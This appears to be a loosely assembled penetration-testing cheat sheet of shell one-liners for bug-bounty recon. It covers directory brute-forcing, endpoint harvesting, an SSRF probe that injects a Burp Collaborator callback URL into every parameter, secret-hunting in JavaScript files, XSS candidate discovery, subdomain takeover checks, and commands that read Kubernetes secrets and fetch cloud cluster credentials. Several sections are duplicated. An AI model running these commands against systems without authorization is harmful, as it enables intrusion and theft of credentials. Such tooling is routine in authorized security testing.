Dir Brute
assetfinder $target | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'gobuster dir -w /path/to/file -u @ -s 200 -t 150 -H "X-Forwarded-For:127.0.0.1"'
cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -e php,html,json,aspx'
/endpoints finder
echo "http://api.uber.com" | waybackurls | cut -d "/" -f 4,5 | sed 's/?.*//' | sort -u
SSRF finder
assetfinder -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net
Sensitive data in JS files
xargs -a urls.txt -I@ sh -c 'python3 SecretFinder.py -i @ -o cli -o '
xargs -a domains -I@ sh -c 'gau @ |grep -iE '\.js'|grep -ivE '\.json'|sort -u >> JS.txt' ; xargs -a JS.txt -n2 -I@ sh -c 'echo -e "\n[URL] @\n"; python3 linkfinder.py -i @ ' >> Url.txt
rush -i urls.txt 'python3 SecretFinder.py -i {} -o cli'
XSS
cat subdomains.txt | waybackurls >> wayback.txt
cat subdomains.txt | hakrawler -depth 3 -plain >> spider.txt
cat spider.txt wayback.txt | kxss
> kubectl get secrets
> kubectl get secret {mysecret} -o json | jq '.data'
{
"api-key": "c2VjcmV0LWFwaS1rZXk=",
"password": "c2VjcmV0LXBhc3N3b3Jk"
}
Note that the values under `.data` are only base64-encoded, not encrypted: anyone who can read the Secret object can recover the plaintext, so limit who may get/list Secrets via RBAC and enable encryption at rest for the cluster's secret store.
You need an AWS Identity and Access Management (IAM) policy that allows the eks:DescribeCluster and eks:ListClusters actions, which lets you list all of the Amazon EKS clusters in your AWS account. The example below grants them on every cluster (`"Resource": "*"`); prefer restricting `Resource` to specific cluster ARNs where the action supports it.
AWS Policy example
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"eks:DescribeCluster",
"eks:ListClusters"
],
"Resource": "*"
}
]
}
> aws eks list-clusters
> aws eks update-kubeconfig --name {name}
> gcloud container clusters list
> gcloud container clusters get-credentials <CLUSTER_NAME>
> az aks list
> az group list
> az aks get-credentials --name <CLUSTER_NAME> --resource-group <RESOURCE_GROUP_NAME>
#kubernetes
> kubectl get secret {mysecret} -o json | jq '.data'
{
"api-key": "c2VjcmV0LWFwaS1rZXk=",
"password": "c2VjcmV0LXBhc3N3b3Jk"
}
You need an AWS Identity and Access Management (IAM) policy that allows the eks:DescribeCluster and eks:ListClusters actions, which lets you list all of the Amazon EKS clusters in your AWS account. The example below grants them on every cluster (`"Resource": "*"`); prefer restricting `Resource` to specific cluster ARNs where the action supports it.
AWS Policy example
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"eks:DescribeCluster",
"eks:ListClusters"
],
"Resource": "*"
}
]
}
> aws eks list-clusters
> aws eks update-kubeconfig --name {name}
> gcloud container clusters list
> gcloud container clusters get-credentials <CLUSTER_NAME>
> az aks list
> az group list
> az aks get-credentials --name <CLUSTER_NAME> --resource-group <RESOURCE_GROUP_NAME>
#kubernetes
Find subdomain takeover
#subdomains #subs #ato
#subdomains #subs #ato
subfinder -d {target} >> domains ; assetfinder -subs-only {target} >> domains ; amass enum -norecursive -noalts -d {target} >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;
1. Информационная безопасность
2. Тестирование процесса безопасности
3. Тестирование технологии веб-безопасности
4. Тестирование безопасности каналов связи
5. Тестирование безопасности беспроводных технологий
6. Тестирование физической безопасности
2. Тестирование процесса безопасности
3. Тестирование технологии веб-безопасности
4. Тестирование безопасности каналов связи
5. Тестирование безопасности беспроводных технологий
6. Тестирование физической безопасности